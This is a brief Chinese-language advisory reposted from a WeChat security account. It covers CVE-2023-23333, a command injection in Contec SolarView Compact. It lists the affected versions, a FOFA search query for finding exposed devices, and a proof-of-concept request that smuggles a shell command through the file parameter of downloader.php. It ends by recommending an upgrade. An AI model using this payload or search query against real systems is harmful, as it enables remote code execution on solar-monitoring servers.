漏洞简介
Contec SolarView Compact 是日本 Contec 公司的一个应用系统,提供光伏发电测量系统。其6.00版本以前存在命令注入漏洞,攻击者可以通过 downloader.php 绕过内部限制执行命令,通过该漏洞在服务器端任意执行代码,获取服务器权限。
影响版本
SolarView
Compact <=
6
.
00
FOFA语句
body
=
"SolarView Compact"
&& title=
"Top"
漏洞复现
抓包,替换POC
downloader
.php?file=
%3
Bpwd
%00
.zip
修复建议
升级版本至最新
原文始发于微信公众号(巢安实验室):CVE-2023-23333—SolarView Compact RCE 任意命令执行
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论